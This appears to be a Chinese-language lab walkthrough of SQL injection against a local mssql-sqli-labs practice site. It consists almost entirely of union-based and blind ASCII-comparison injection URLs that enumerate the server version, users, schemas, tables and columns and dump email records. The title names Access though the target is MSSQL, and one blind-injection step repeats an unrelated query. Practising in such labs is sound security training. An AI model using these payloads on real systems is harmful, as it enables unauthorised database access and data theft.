Access数据库的union查询

环境

在win2008上搭建的 mssql-sqli-labs环境
目标：Lab1，判断为 ‘ 注入

步骤

1。order by 3 确定有 3 列

2。

http://192.168.75.133/less-1.asp?id=1' union select '1','2','3' –

mssql数字和字符串不能一起使用

3。查询版本

http://192.168.75.133/less-1.asp?id=1' union select '1','2',@@version --

4。获database()名称

http://192.168.75.133/less-1.asp?id=1' union select '1','2',db_name()--

5。获取当前用户名

http://192.168.75.133/less-1.asp?id=1' union select '1','2',user  --

http://192.168.75.133/less-1.asp?id=1' union select '1','2',system_user  --

http://192.168.75.133/less-1.asp?id=1' union select '1','2',current_user  --

获取服务器主机信息
http://192.168.75.133/less-1.asp?id=1' union select '1','2',@@servername  --

6。查询库名

http://192.168.75.133/less-1.asp?id=1' union select '1','2', (select count(schema_name) from information_schema.schemata)  --

然后依次导出
http://192.168.75.133/less-1.asp?id=1' union select '1','2', (select top 1 schema_name from information_schema.schemata where schema_name not in ('dbo','db_accessadmin','db_backupoperator','db_datareader','db_datawriter','db_ddladmin','db_denydatareader','db_denydatawriter','db_owner','db_securityadmin','guest','INFORMATION_SCHEMA','sys'))  --

7。找表名

http://192.168.75.133/less-1.asp?id=1' union select '1','2', (select top 1 table_name from information_schema.tables  )  -- 

http://192.168.75.133/less-1.asp?id=1' union select '1','2', (select top 1 table_name from information_schema.tables where table_name not in ('emails')  )  --

依次类推爆出四个表
http://192.168.75.133/less-1.asp?id=1' union select '1','2', (select top 1 table_name from information_schema.tables where table_name not in ('emails','uagents','referers','users')  )  --

8。爆表中的列

http://192.168.75.133/less-1.asp?id=1' union select '1','2', (select top 1 column_name from information_schema.columns where table_name='emails')  --

依次爆出字段
http://192.168.75.133/less-1.asp?id=1' union select '1','2', (select top 1 column_name from information_schema.columns where column_name not in ('id','email_id','uagent','ip_address','username','referer','password'))  --

9。以emails表为例

http://192.168.75.133/less-1.asp?id=1' union select '1','2', (select top 1id from emails)  --

http://192.168.75.133/less-1.asp?id=1' union select '1','2', (select top 1 email_id from emails ) --

盲注查询version

1。确定version()字符串长度

http://192.168.75.133/less-1.asp?id=1' union select '1','2', (select top 1 email_id from emails ) --

2。取单个字符进行ASCII比较

http://192.168.75.133/less-1.asp?id=1' and ascii(substring(@@version,1,1)) > 76 –
确定是77，M依次类推（简便的方式使用union查看单个ascii快速确定字符串
http://192.168.75.133/less-1.asp?id=1' union select '1','2',ascii(substring(@@version,1,1))  --
）

最终确定version字符

    Microsoft SQL Server 2008 R2 (RTM) - 10.50.1600.1 (X64) Apr 2 2010 15:48:46 Copyright (c) Microsoft Corporation Enterprise Edition (64-bit) on Windows NT 6.1 (Build 7601: Service Pack 1) (Hypervisor)